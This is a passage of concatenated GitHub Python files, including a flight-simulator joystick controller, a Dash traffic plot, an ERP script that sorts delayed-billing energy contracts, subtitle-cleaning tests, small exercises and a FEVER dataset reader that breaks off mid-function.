TimeSequenceController(BaseController):\n \"\"\"A controller for controlling an aircraft with ailerons, elevators, and rudder, and a throttle using a standard keyboard.\n\n Parameters\n ----------\n control_dict : dict\n A dictionary of control names and specifications.\n \"\"\"\n\n\n def __init__(self, control_dict, quit_flag, view_flag, pause_flag, data_flag, enable_interface, control_output):\n super().__init__(control_dict, quit_flag, view_flag, pause_flag, data_flag, enable_interface, control_output)\n\n self._input_dict = control_dict\n\n\n def read_control_file(self, control_file):\n \"\"\"Reads in a time sequence input file of control settings.\"\"\"\n\n # Read in file\n self._control_data = np.genfromtxt(control_file, delimiter=',')\n\n # Get final time\n self._t_end = np.max(self._control_data[:,0])\n\n\n def get_control(self, t, state_vec, prev_controls):\n \"\"\"Returns the controls based on the inputted state.\n\n Parameters\n ----------\n t : float\n Time index\n\n state_vec : list\n State vector of the entity being controlled.\n\n prev_controls : dict\n Previous control values.\n \"\"\"\n\n # Get control\n control_state = {}\n for name in self._controls:\n i = self._column_mapping[name]\n default = prev_controls[name]\n control_state[name] = np.interp(t, self._control_data[:,0], self._control_data[:,i], left=default, right=default)\n\n # Check if we've reached the end\n if t > self._t_end:\n self._quit_flag.value = 1\n\n return control_state\n\n\ndef joystick_listener(axes_def, quit_flag, throttle_perturbed_flag, trim_dn_pressed, trim_up_pressed):\n \"\"\"Listens to the joystick input and posts latest values to the manager list.\"\"\"\n\n # While the game is still going\n while not quit_flag.value:\n\n # Wait for events\n events = inputs.get_gamepad()\n\n # Parse events\n try:\n for event in events:\n\n # Analog inputs\n if event.ev_type == 'Absolute':\n\n # Roll axis\n if event.code == 'ABS_X':\n axes_def[0] = event.state/511.5-1.0\n\n # Pitch axis\n elif event.code == 'ABS_Y':\n axes_def[1] = event.state/511.5-1.0\n\n # Yaw axis\n elif event.code == 'ABS_RZ':\n axes_def[2] = event.state/127.5-1.0\n\n # Throttle axis\n elif event.code == 'ABS_THROTTLE':\n if not throttle_perturbed_flag.value:\n throttle_perturbed_flag.value = 1\n axes_def[3] = event.state/127.5-1.0\n\n # Button inputs\n elif event.ev_type == \"Key\":\n\n # Increase trim\n if event.code == \"BTN_TOP2\":\n trim_up_pressed.value = not trim_up_pressed.value\n\n # Decrease trim\n elif event.code == \"BTN_THUMB2\":\n trim_dn_pressed.value = not trim_dn_pressed.value\n\n except BrokenPipeError:\n return\n\n except FileNotFoundError:\n return\n\n except ConnectionResetError:\n return\n\n return","repo_name":"2936691/Pylot","sub_path":"pylot/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":19051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"16723717434","text":"from data.MC1.data import get_data, filter_data\n\nfrom dash import dcc, html\nimport plotly.express as px\nimport pandas as pd\n\nclass Hover_plot(html.Div):\n def __init__(self, name):\n self.html_id = name.lower().replace(\" \", \"-\")\n \n # Equivalent to `html.Div([...])`\n super().__init__(\n className=\"graph_card\",\n children=[\n dcc.Graph(id=self.html_id)\n ],\n )\n\n self.df = get_data()\n self.locations = pd.read_parquet(\"data\\MC1\\locations.parquet\").sort_values(by=\"location\")\n\n def get_plot(self, point, month, car_type):\n \"\"\"\n This function updates the hover graph after hovering over a gate\n\n Parameters:\n ----------\n point (list): The coordinates of the gate that is hovered over\n months (list): The months that are selected\n car_type (str): The type of car that is selected\n\n Returns:\n -------\n fig (go.Figure()): The updated figure\n \"\"\"\n # Find which gate is being hovered on\n gate = \"\"\n for index, value in self.locations.iterrows():\n if value[\"coordinates\"][0] * 4 == point[0] and (200 - value[\"coordinates\"][1]) * 4 == point[1]:\n gate = value[\"location\"]\n \n\n # Filter on gate\n filtered_df = self.df.loc[self.df[\"gate-name\"] == gate]\n\n # Filter on month\n filtered_df = filter_data(filtered_df, [None, month])\n\n # Group on car type\n grouped_data = filtered_df.groupby(\"car-type\", as_index=False).count()\n\n # Rename column\n data_per_type = grouped_data.rename(columns={\"Timestamp\": \"count\"})\n \n # Compute total count\n total_count = data_per_type[\"count\"].sum()\n\n # Round the results to two decimals\n data_per_type[\"percentage\"] = round((data_per_type[\"count\"] / total_count) * 100, 2)\n\n # If a specific car type is selected\n if car_type != '0':\n # Select only those cars\n data_one_car = data_per_type.loc[data_per_type[\"car-type\"] == car_type]\n if data_one_car.empty:\n total_count = 0\n else:\n total_count = data_one_car[\"count\"].values[0]\n\n # Rename the values of car types\n data_per_type.replace({\"car-type\": {\"1\": \"Two-axle car\", \n \"2\": \"Two-axle truck\",\n \"2P\": \"Two-axle truck (Park service)\",\n \"3\": \"Three-axle truck\",\n \"4\": \"Four-axle (and above) truck\",\n \"5\": \"Two-axle bus\",\n \"6\": \"Three-axle bus\"}}, inplace=True)\n\n # Construct figure\n fig = px.bar(data_per_type, x=\"car-type\", y=\"percentage\", hover_data=[\"percentage\", \"count\"], \n width=400, height=400, title=\"Gate: \" + gate + \"| Total count:\" + str(total_count))\n\n return fig","repo_name":"MaartenVanSluijs/visual-analytics-dashboard","sub_path":"src/plots/hover_plot.py","file_name":"hover_plot.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44988843945","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\nfrom validacio_eines import lazyOOOP, daysAgo\nimport consolemsg\nfrom yamlns import namespace as ns\nimport xmlrpclib\nimport socket\nimport time\n\n# logging presets\nioModePresets = {\n 'debug': None,\n 'release': ['success', 'error', 'fail'],\n}\n\n\n# the proxy\nclass ProxyAllow:\n def __init__(self, object, allowed=None, default=None):\n self.object = object\n self.allowed = allowed\n self.default = default\n\n def __getattr__(self, name):\n if self.allowed is None or name in self.allowed:\n try:\n return getattr(self.object, name)\n except AttributeError:\n if self.default:\n return getattr(self.object, self.default)\n\n return getattr(self, 'idle')\n\n def idle(self, *args, **kwds):\n pass\n\n\n# helper functions\ndef hours(seconds):\n m, s = divmod(seconds, 60)\n h, m = divmod(m, 60)\n if h > 0:\n return \"%d:%02d:%02d\" % (h, m, s)\n else:\n return \"%02d:%02d\" % (m, s)\n\n\n# the class\nclass Searcher:\n def __init__(self, limits=None, ioMode=None):\n self.limits_min = min(limits) if limits else None\n self.limits_max = max(limits) if limits else None\n self.broken_connection_wait = 3\n self.io = ProxyAllow(\n object=consolemsg,\n allowed=ioModePresets.get(ioMode, None),\n default='step')\n self.result = ns({})\n self.result.connectionErrors = 0\n self.template = \"output template, connection errors {connectionErrors}\"\n\n def run(self):\n self.setup()\n self.start = time.time()\n try:\n for key, counter in self.key_generator():\n if self.handbrake(counter):\n continue\n try:\n item_data = self.item_data_loader(key)\n caught = False\n for method in sorted(dir(self)):\n if (\n callable(getattr(self, method)) and\n method.startswith('test_')\n ):\n test_case_func = getattr(self, method)\n caught = test_case_func(counter, item_data)\n if caught:\n self.io.info(\n \"catched by {}, no more testing\",\n method)\n break\n if not caught:\n self.not_caught_by_tests(counter, item_data)\n except xmlrpclib.ProtocolError:\n self.io.error(\"Broken connection, nap time!\")\n self.result.connectionErrors += 1\n time.sleep(self.broken_connection_wait)\n except socket.error:\n self.io.error(\"Broken socket, nap time!\")\n self.result.connectionErrors += 1\n time.sleep(self.broken_connection_wait)\n self.io.bigstep(\"Done in {}\", self.get_elapsed_time())\n except KeyboardInterrupt:\n self.io.error(\"Pressed ctrl+C , exiting the main loop\")\n\n self.do_repport()\n\n def handbrake(self, v):\n if self.limits_min and v < self.limits_min:\n return True\n\n if self.limits_max and v > self.limits_max:\n return True\n\n return False\n\n def do_repport(self):\n self.io.info(\"Result data preparation\")\n for key in self.result.keys():\n len_key = 'len_'+key\n if len_key in self.template:\n self.result[len_key] = len(self.result[key])\n str_key = 'str_'+key\n if str_key in self.template:\n self.result[str_key] = \",\".join(self.result[key])\n name_key = 'names_'+key\n if name_key in self.template:\n self.result[name_key] = \",\".join(\n [str(i) for i in self.result[key]]\n )\n self.result[name_key] = \",\".join(\n [i.name for i in self.result[key]]\n )\n id_key = 'ids_'+key\n if id_key in self.template:\n self.result[id_key] = \",\".join(\n [str(i.id) for i in self.result[key]]\n )\n self.io.info(\"Result template instantiation\")\n self.io.success(self.template.format(**self.result))\n\n # Overridable functions\n def setup(self):\n self.io.bigstep(\"make the setup\")\n self.result['test'] = 'case'\n\n def key_generator(self):\n for counter, key in enumerate(range(0, 10)):\n self.io.bigstep(\"processing item {}\".format(key))\n yield key, counter + 1\n\n def item_data_loader(self, key):\n yield ns({'key': key})\n\n def not_caught_by_tests(self, counter, polissa):\n pass\n\n # Helper funtions\n def get_elapsed_time(self):\n return hours(time.time() - self.start)\n\n def get_loop_times(self, partials, totals):\n elapsed = time.time() - self.start\n expected = (elapsed * totals) / partials\n remaining = expected - elapsed\n return (\n hours(elapsed),\n hours(remaining),\n hours(expected)\n )\n\n\n# Debugging constants\ntoday = None\noutputMode = 'release'\n\n\n# Helper funtions\ndef today_minus(days):\n return daysAgo(days, date=today)\n\n\ndef date_minus(date, days=1):\n return daysAgo(days=days, date=date)\n\n\ndef date_plus(date, days=1):\n return daysAgo(days=(days*(-1)), date=date)\n\n\nclass SearchStrandedAndDelayed(Searcher):\n def __init__(self, limits=None):\n Searcher.__init__(self, limits, outputMode)\n self.result.last_polissa_created = None\n self.result.with_draft_invoices = []\n self.result.never_billed_no_meters = [] # endarrerides\n self.result.never_billed_stranded = []\n self.result.never_billed_distri_shame = [] # endarrerida\n self.result.billed_tchange_no_meters = [] # endarrerides\n self.result.billed_tchange_stranded = []\n self.result.billed_tchange_distri_shame = [] # endarrerida\n self.result.billed_but_no_invoces = []\n self.result.billed_no_meters = []\n self.result.billed_furder_stranded = []\n self.result.billed_furder_distri_shame = []\n self.result.late_billing = []\n self.template = \"\"\"\nRESUM DE L'SCRIPT:\n------------------\nAquest script classifica en diferents categories les polisses que estan a \\\nl'apartat de \"Contractes amb facturació endarrerida\" del ERP.\nLes polisses sortiran ordenades per data de l'última lectura facturada.\nSerà mes fiable si el passem despres d'haver obert factures al procés.\n\n * Polisses amb factures en esborrany: {len_with_draft_invoices}\n {names_with_draft_invoices}\n\n * Polisses que no han facturat mai:\n - Sense contadors : {len_never_billed_no_meters}\n {names_never_billed_no_meters}\n\n - Valorar si cal posar reclamació a distri: {len_never_billed_distri_shame}\n {names_never_billed_distri_shame}\n\n - Encallades, requereixen actuació manual: {len_never_billed_stranded}\n {names_never_billed_stranded}\n\n * Polisses amb canvi de titular i no han facturat mai:\n - Sense contadors : {len_billed_tchange_no_meters}\n {names_billed_tchange_no_meters}\n\n - Valorar si cal posar reclamació a distri: \\\n{len_billed_tchange_distri_shame}\n {names_billed_tchange_distri_shame}\n\n - Encallades, requereixen actuació manual: {len_billed_tchange_stranded}\n {names_billed_tchange_stranded}\n\n * Polisses que han facturat:\n - Sense factures : {len_billed_but_no_invoces}\n {names_billed_but_no_invoces}\n\n - Sense contadors : {len_billed_no_meters}\n {names_billed_no_meters}\n\n - Valorar si cal posar reclamació a distri: \\\n{len_billed_furder_distri_shame}\n {names_billed_furder_distri_shame}\n\n - Encallades, requereixen actuació manual: {len_billed_furder_stranded}\n {names_billed_furder_stranded}\n\n * Polisses que no han entrat en les anteriors (endarrerides): \\\n{len_late_billing}\n {names_late_billing}\n\n Notes:\n Talls de connexió: {connectionErrors}\n Data creació última polissa : {last_polissa_created}\n El avuí es : {today}\n\"\"\"\n\n def setup(self):\n self.io.step(\"Connectant a l'erp\")\n self.Orm = lazyOOOP()\n self.io.success(\"Connectat\")\n self.pol_obj = self.Orm.GiscedataPolissa\n self.fact_obj = self.Orm.GiscedataFacturacioFactura\n self.pool_obj = self.Orm.GiscedataLecturesLecturaPool\n\n create_date = self.get_last_polissa_create_date()\n self.io.info(\"Última polissa creada a data : {}\", create_date)\n self.result.last_polissa_created = create_date\n self.result.today = today\n\n def key_generator(self):\n pol_ids = self.pol_obj.search(\n [('facturacio_endarrerida', '=', True)],\n order='data_ultima_lectura ASC, data_alta ASC') # Delayed only\n\n totals = len(pol_ids)\n\n for counter, pol_id in enumerate(pol_ids):\n item = counter + 1\n (elapsed, remaining, expected) = self.get_loop_times(item, totals)\n self.io.bigstep(\n \"{}/{} processing polissa id {} .. ( {} / {} / {} )\",\n item,\n totals,\n pol_id,\n elapsed,\n remaining,\n expected)\n yield pol_id, item\n\n def item_data_loader(self, key):\n return self.pol_obj.browse(key)\n\n def not_caught_by_tests(self, counter, polissa):\n self.result.late_billing.append(polissa)\n\n # Helper funtions\n def get_last_polissa_create_date(self):\n last_pol_ids = self.pol_obj.search(\n [],\n order=\"create_date DESC\",\n limit=1)\n last_pols = self.pol_obj.perm_read(last_pol_ids)\n return last_pols[0]['create_date']\n\n def get_initial_pool_readings(self, polissa):\n for meter in polissa.comptadors:\n for measure in meter.pool_lectures:\n if (\n (measure.name == polissa.data_alta) or\n (measure.name == date_minus(polissa.data_alta))\n ):\n return measure.name\n return None\n\n def has_next_to_date_pool_readings(self, polissa, date_from):\n for meter in polissa.comptadors:\n for measure in meter.pool_lectures:\n if measure.name > date_from:\n return True\n return False\n\n def has_next_to_date_lect_readings(self, polissa, date_from):\n for meter in polissa.comptadors:\n for measure in meter.lectures:\n if measure.name > date_from:\n return True\n return False\n\n def get_last_customer_invoice(self, polissa):\n facts = self.fact_obj.search([\n ('polissa_id', '=', polissa.id),\n ('origin', '=', False),\n ('type', 'in', ['out_refund', 'out_invoice']),\n ], order='date_invoice DESC'\n )\n if not facts:\n return None\n return self.fact_obj.browse(facts[0])\n\n def has_draft_invoices(self, polissa):\n facts = self.fact_obj.search([\n ('polissa_id', '=', polissa.id),\n ('origin', '=', False),\n ('type', 'in', ['out_refund', 'out_invoice']),\n ('state', '=', 'draft'),\n ], order='date_invoice DESC'\n )\n return facts\n\n # testing contracts with draft invoices\n def test_1_contract_with_draft_invoices(self, counter, polissa):\n draft_invoices = self.has_draft_invoices(polissa)\n if draft_invoices:\n self.io.info(\n \"la polissa {} te {} factures en esborrany\",\n polissa.name,\n len(draft_invoices))\n self.result.with_draft_invoices.append(polissa)\n return True\n return False\n\n # testing the never billed contrats, case A in documentation\n def test_2_never_billed_contract(self, counter, polissa):\n if polissa.data_ultima_lectura:\n return False\n if polissa.facturacio_suspesa:\n return False\n if polissa.data_alta > today_minus(60):\n return False\n if len(polissa.comptadors) == 0:\n self.io.info(\n \"la polissa {} no ha facturat mai i no te comptadors\",\n polissa.name)\n self.result.never_billed_no_meters.append(polissa)\n return True\n\n initial_pool_reading = self.get_initial_pool_readings(polissa)\n if initial_pool_reading:\n\n if self.has_next_to_date_pool_readings(polissa, polissa.data_alta):\n self.io.info(\n \"la polissa {} no ha facturat mai i encallada\",\n polissa.name)\n self.result.never_billed_stranded.append(polissa)\n return True\n else:\n if (\n polissa.facturacio_potencia != 'max' and\n not polissa.no_estimable\n ):\n self.io.info(\n \"la polissa {} no ha facturat mai i encallada\",\n polissa.name)\n self.result.never_billed_stranded.append(polissa)\n return True\n\n self.io.info(\n \"la polissa {} no ha facturat mai i culpa de distri\",\n polissa.name)\n self.result.never_billed_distri_shame.append(polissa)\n return True\n\n # testing the billed contrats with cholder change, case A' in documentation\n def test_3_billed_contract_titular_change(self, counter, polissa):\n if not polissa.data_ultima_lectura:\n return False\n if polissa.data_ultima_lectura > polissa.data_alta:\n return False\n if polissa.facturacio_suspesa:\n return False\n\n if len(polissa.comptadors) == 0:\n self.io.info(\n \"la polissa {} no ha facturat mai i no te comptadors\",\n polissa.name)\n self.result.billed_tchange_no_meters.append(polissa)\n return True\n\n initial_pool_reading = self.get_initial_pool_readings(polissa)\n if initial_pool_reading:\n\n if self.has_next_to_date_pool_readings(polissa, polissa.data_alta):\n self.io.info(\n \"la polissa {} no ha facturat mai i encallada\",\n polissa.name)\n self.result.billed_tchange_stranded.append(polissa)\n return True\n else:\n if (\n polissa.facturacio_potencia != 'max' and\n not polissa.no_estimable\n ):\n self.io.info(\n \"la polissa {} no ha facturat mai i encallada\",\n polissa.name)\n self.result.billed_tchange_stranded.append(polissa)\n return True\n\n self.io.info(\n \"la polissa {} no ha facturat mai i culpa de distri\",\n polissa.name)\n self.result.billed_tchange_distri_shame.append(polissa)\n return True\n\n # testing the billed contrats, case B in documentation\n def test_4_billed_contracts(self, counter, polissa):\n if not polissa.data_ultima_lectura:\n return False\n\n if polissa.data_ultima_lectura <= polissa.data_alta:\n return False\n\n last_inv = self.get_last_customer_invoice(polissa)\n if not last_inv:\n self.io.info(\n \"la polissa {} consta com a facturada pero no trobem cap \"\n \"factura!\",\n polissa.name)\n self.result.billed_but_no_invoces.append(polissa)\n return True\n\n if last_inv.date_invoice >= today_minus(35):\n return False\n\n if polissa.facturacio_suspesa:\n return False\n\n if len(polissa.comptadors) == 0:\n self.io.info(\n \"la polissa {} ha facturat i no te comptadors\",\n polissa.name)\n self.result.billed_no_meters.append(polissa)\n return True\n\n has_further_pool_readings = self.has_next_to_date_pool_readings(\n polissa,\n polissa.data_ultima_lectura)\n if has_further_pool_readings:\n self.io.info(\n \"la polissa {} ha facturat i te lectures a pool despres de la\"\n \" última factura, encallada\",\n polissa.name)\n self.result.billed_furder_stranded.append(polissa)\n return True\n\n has_further_lect_readings = self.has_next_to_date_lect_readings(\n polissa,\n polissa.data_ultima_lectura)\n if has_further_lect_readings:\n self.io.info(\n \"la polissa {} ha facturat i te lectures a lectures despres de\"\n \"la última factura, encallada\",\n polissa.name)\n self.result.billed_furder_stranded.append(polissa)\n return True\n\n if not polissa.tarifa.name.startswith(\"2.\"):\n self.io.info(\n \"la polissa {} ha facturat i te lectures despres de la\"\n \" última factura no es 2.X\",\n polissa.name)\n self.result.billed_furder_distri_shame.append(polissa)\n return True\n\n if polissa.facturacio_potencia != 'icp':\n self.io.info(\n \"la polissa {} ha facturat i te lectures despres de la\"\n \" última factura amb maximetre\",\n polissa.name)\n self.result.billed_furder_distri_shame.append(polissa)\n return True\n\n if polissa.no_estimable:\n self.io.info(\n \"la polissa {} ha facturat i te lectures despres de la\"\n \" última factura no estimable\",\n polissa.name)\n self.result.billed_furder_distri_shame.append(polissa)\n return True\n\n self.io.info(\n \"la polissa {} ha facturat i te lectures a lectures despres de\"\n \"la última factura, encallada\",\n polissa.name)\n self.result.billed_furder_stranded.append(polissa)\n return True\n\n\nif __name__ == \"__main__\":\n # s = Searcher()\n # s.run()\n s = SearchStrandedAndDelayed()\n s.run()\n","repo_name":"Som-Energia/somenergia-scripts","sub_path":"invoicing/measurefixing/search_stranded_and_delayed_contracts.py","file_name":"search_stranded_and_delayed_contracts.py","file_ext":"py","file_size_in_byte":18495,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"4206563641","text":"import unittest\nfrom pysubs2 import SSAFile\nfrom module.cleaner import Cleaner\n\nclass CleanerTest(unittest.TestCase):\n \n def test_clean_misc_symbol(self):\n raw_misc_symbol = \"\"\"\n 1\n 00:00:01,101 --> 00:00:04,071\n ⦅そういうものだよ みんなとの冒険だって➡\n \"\"\"\n\n cleaned_misc_symbol = \"\"\"\n 1\n 00:00:01,101 --> 00:00:04,071\n そういうものだよ みんなとの冒険だって\n \"\"\"\n\n cleaned_subs = SSAFile.from_string(cleaned_misc_symbol)\n cleaned_subs = cleaned_subs[0].text\n\n subs = SSAFile.from_string(raw_misc_symbol)\n subs = Cleaner.clean_misc_symbol(subs)\n subs = subs[0].text\n\n self.assertEqual(subs, cleaned_subs)\n \n def test_clean_sound_effects(self):\n raw_sound_effect = \"\"\"\n 1\n 00:00:01,101 --> 00:00:04,071\n (アイゼン)フリーレン(ドアを閉める音)\n 魂の眠る地を探して\n \"\"\"\n \n cleaned_sound_effect = \"\"\"\n 1\n 00:00:01,101 --> 00:00:04,071\n フリーレン\n 魂の眠る地を探して\n \"\"\"\n\n cleaned_subs = SSAFile.from_string(cleaned_sound_effect)\n cleaned_subs = cleaned_subs[0].text\n\n subs = SSAFile.from_string(raw_sound_effect)\n subs = Cleaner.clean_sound_effects(subs)\n subs = subs[0].text\n\n self.assertEqual(subs, cleaned_subs)\n\n\n def test_strip_whitespace(self):\n whitespace = \"\"\"\n 1\n 00:00:01,101 --> 00:00:04,071\n  フリーレン\n 魂の眠る地を探して\n \"\"\"\n \n cleaned_whitespace = \"\"\"\n 1\n 00:00:01,101 --> 00:00:04,071\n フリーレン\n 魂の眠る地を探して\n \"\"\"\n\n cleaned_subs = SSAFile.from_string(cleaned_whitespace)\n cleaned_subs = cleaned_subs[0].text\n \n subs = SSAFile.from_string(whitespace)\n subs = Cleaner.strip_whitespace(subs)\n subs = subs[0].text\n\n self.assertEqual(subs, cleaned_subs)\n\n def test_apply_clean_style(self):\n style_name = 'CleanStyle'\n\n sub = \"\"\"\n 1\n 00:00:01,101 --> 00:00:04,071\n フリーレン\n 魂の眠る地を探して\n \"\"\"\n\n subs = SSAFile.from_string(sub)\n styled_subs = Cleaner.clean_style(subs)\n styled_subs_style = styled_subs[0].style\n\n self.assertEqual(styled_subs_style, style_name)\n\n\n def test_clean_romaji(self):\n raw_romaji = \"\"\"\n 1\n 00:00:01,101 --> 00:00:04,071\n 齢(よわい)12歳にして最強クラスの狩竜人\n \"\"\"\n \n cleaned_romaji = \"\"\"\n 1\n 00:00:01,101 --> 00:00:04,071\n 齢12歳にして最強クラスの狩竜人\n \"\"\"\n\n cleaned_subs = SSAFile.from_string(cleaned_romaji)\n cleaned_subs = cleaned_subs[0].text\n\n subs = SSAFile.from_string(raw_romaji)\n subs = Cleaner.clean_romaji(subs)\n subs = subs[0].text\n\n self.assertEqual(subs, cleaned_subs)","repo_name":"wanhuz/kome","sub_path":"tests/test_cleaner.py","file_name":"test_cleaner.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73388849706","text":"\n\n\nprimes = [2,3,5,7]\nbase_primes = [2, 3, 5, 7]\ncount = 9\n\n\nimport time\nimport math\n\n\nstart = time.time()\n\n\ndef is_prime(n):\n\tif n & 1 == 0:\n\t\treturn 2\n\n\td = 3\n\twhile d * d <= n:\n\t\tif n % d == 0:\n\t\t\treturn d\n\n\t\td = d + 2\n\n\n\treturn 0\n\n\nwhile len(primes) < 10001:\n\tif is_prime(count) == 0:\n\t\tprimes.append(count)\n\n\tcount += 2\n\nprint(primes[-1], len(primes))\nend = time.time()\nprint('exec time: ', end-start)\n","repo_name":"zachbroad/euler","sub_path":"10001_prime.py","file_name":"10001_prime.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7155134578","text":"def digits_sum(number):\n odd_sum = 0\n even_sum = 0\n for digit in number:\n if int(digit) % 2 == 0:\n even_sum += int(digit)\n else:\n odd_sum += int(digit)\n return even_sum, odd_sum\n\n\nsingle_number = input()\neven, odd = digits_sum(single_number)\nprint(f'Odd sum = {odd}, Even sum = {even}')","repo_name":"IvaDrRad/SoftUni-Python","sub_path":"Programming-Fundamentals-Python/Functions/odd_and_even_sum.py","file_name":"odd_and_even_sum.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44076040870","text":"\"\"\"Project logger module.\"\"\"\n\nimport logging\nimport os\nimport sys\nfrom logging.handlers import TimedRotatingFileHandler\n\nLOGS_PATH = 'calls/logging/logs'\nBACKUP_COUNT = 30\n\nos.makedirs(LOGS_PATH, exist_ok=True)\n\n\nclass Logger(object):\n \"\"\"Default logger for project.\"\"\"\n\n logger = logging.getLogger('calls_logger')\n handler_log_rotation = TimedRotatingFileHandler(\n f'{LOGS_PATH}/calls_loggs.log',\n when='D',\n interval=1,\n backupCount=BACKUP_COUNT,\n encoding='utf-8',\n )\n handler_stdout = logging.StreamHandler(sys.stdout)\n formatter = logging.Formatter('[%(asctime)s] [%(levelname)s] [%(name)s] %(message)s')\n\n\ncalls_logger = Logger()\nlogger = calls_logger.logger\nlogger.setLevel(logging.INFO)\ncalls_logger.handler_stdout.setFormatter(calls_logger.formatter)\ncalls_logger.handler_stdout.setFormatter(calls_logger.formatter)\nlogger.addHandler(calls_logger.handler_log_rotation)\nlogger.addHandler(calls_logger.handler_stdout)\n","repo_name":"Slavchick12/calls","sub_path":"calls/calls/logging/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43177295890","text":"# return masked string\ndef maskify(cc):\n print(cc)\n to_string = str(cc)\n to_mask = to_string[1:-3]\n masked = ''\n for each in to_mask:\n x = each.replace(each, '#')\n masked = masked + x\n unmasked = to_string[-4:]\n final = masked + unmasked\n return final\n\n\n\n\n\ncc1 = 4450500016172487\ncc2 = 4450008092914556\nstring_test1 = 'reeeeeaaaaaaalllllllllyyyyyyyyyyyyyy'\nstring_test2 = 'skippyTheSpaceCowboy'\n\nprint(maskify(cc1))\nprint('\\n')\nprint(maskify(cc2))\nprint('\\n')\nprint(maskify(string_test1))\nprint('\\n')\nprint(maskify(string_test2))\nprint('\\n')\n\n","repo_name":"borkusgod/CodeWarsChallengeFolder","sub_path":"Python/7kyu/credit_card_mask/credit_card_mask.py","file_name":"credit_card_mask.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6247587753","text":"import collections\nimport json\nimport logging\nfrom typing import List, Tuple\n\nimport nltk\nimport torch\nfrom pytorch_pretrained_bert.tokenization import BertTokenizer\nfrom tqdm import tqdm\n\nfrom data.data_instance import QAFullInputFeatures, QAFullExample, ModelState, FullResult\nfrom general_util import utils\n\nlogger = logging.getLogger(__name__)\n\n\nclass FeverReader(object):\n def __init__(self):\n super(FeverReader, self).__init__()\n self.sentence_tokenizer = nltk.data.load('tokenizers/punkt/english.pickle')\n self.yesno_cate = utils.CategoricalAccuracy(['yes', 'no'])\n\n def read(self, input_file):\n logger.info(f'Reading data set from {input_file}...')\n with open(input_file, 'r') as f:\n data = json.load(f)\n\n def is_whitespace(ch):\n if ch == \" \" or ch == \"\\t\" or ch == \"\\r\" or ch == \"\\n\" or ord(ch) == 0x202F:\n return True\n return False\n\n examples = []\n for instance_id in tqdm(data, desc=f'Reading examples from {input_file}...', total=len(data)):\n claim = data[instance_id]['claim']\n sentence_id = data[instance_id]['evidence']\n label = data[instance_id]['label'].lower()\n passage = data[instance_id]['passage']\n\n doc_tokens = []\n prev_is_whitespace = True\n char_to_word_offset = []\n for c in passage:\n if is_whitespace(c):\n prev_is_whitespace = True\n else:\n if prev_is_whitespace:\n doc_tokens.append(c)\n else:\n doc_tokens[-1] += c\n prev_is_whitespace = False\n char_to_word_offset.append(len(doc_tokens) - 1)\n\n # Split context into sentences\n sentence_start_list, sentence_end_list = utils.split_sentence(passage, self.sentence_tokenizer)\n sentence_span_list = []\n for c_start, c_end in zip(sentence_start_list, sentence_end_list):\n t_start = char_to_word_offset[c_start]\n t_end = char_to_word_offset[c_end]\n sentence_span_list.append((t_start, t_end))\n\n if label == 'yes':\n answer_choice = 0\n elif label == 'no':\n answer_choice = 1\n else:\n raise RuntimeError(f'Wrong label for {label}')\n\n example = QAFullExample(\n qas_id=instance_id,\n question_text=claim,\n doc_tokens=doc_tokens,\n sentence_span_list=sentence_span_list,\n orig_answer_text=\"\",\n start_position=None,\n end_position=None,\n sentence_id=sentence_id,\n is_impossible=answer_choice,\n ral_start_position=None,\n ral_end_position=None\n )\n examples.append(example)\n return examples\n\n @staticmethod\n def convert_examples_to_features(examples: List[QAFullExample], tokenizer: BertTokenizer, max_seq_length: int, doc_stride: int,\n max_query_length: int, is_training: bool):\n unique_id = 1000000000\n features = []\n for (example_index, example) in tqdm(enumerate(examples), desc='Converting examples to features..', total=len(examples)):\n query_tokens = tokenizer.tokenize(example.question_text)\n\n if len(query_tokens) > max_query_length:\n query_tokens = query_tokens[-max_query_length:]\n\n tok_to_orig_index = []\n orig_to_tok_index = []\n all_doc_tokens = []\n for (i, token) in enumerate(example.doc_tokens):\n orig_to_tok_index.append(len(all_doc_tokens))\n sub_tokens = tokenizer.tokenize(token)\n for sub_token in sub_tokens:\n tok_to_orig_index.append(i)\n all_doc_tokens.append(sub_token)\n\n sentence_spans = []\n for (start, end) in example.sentence_span_list:\n piece_start = orig_to_tok_index[start]\n if end < len(example.doc_tokens) - 1:\n piece_end = orig_to_tok_index[end + 1] - 1\n else:\n piece_end = len(all_doc_tokens) - 1\n sentence_spans.append((piece_start, piece_end))\n\n max_tokens_for_doc = max_seq_length - len(query_tokens) - 3\n\n _DocSpan = collections.namedtuple(\"DocSpan\", [\"start\", \"length\"])\n doc_spans = []\n start_offset = 0\n while start_offset < len(all_doc_tokens):\n length = len(all_doc_tokens) - start_offset\n if length > max_tokens_for_doc:\n length = max_tokens_for_doc\n doc_spans.append(_DocSpan(start=start_offset, length=length))\n if start_offset + length == len(all_doc_tokens):\n break\n start_offset += min(length, doc_stride)\n\n sentence_spans_list = []\n sentence_ids_list = []\n for span_id, doc_span in enumerate(doc_spans):\n span_start = doc_span.start\n span_end = span_start + doc_span.length - 1\n\n span_sentence = []\n sen_ids = []\n for sen_idx, (sen_start, sen_end) in enumerate(sentence_spans):\n if sen_end < span_start:\n continue\n if sen_start > span_end:\n break\n span_sentence.append((max(sen_start, span_start), min(sen_end, span_end)))\n sen_ids.append(sen_idx)\n\n sentence_spans_list.append(span_sentence)\n sentence_ids_list.append(sen_ids)\n\n ini_sen_id: List[int] = example.sentence_id\n for (doc_span_index, doc_span) in enumerate(doc_spans):\n\n token_to_orig_map = {}\n token_is_max_context = 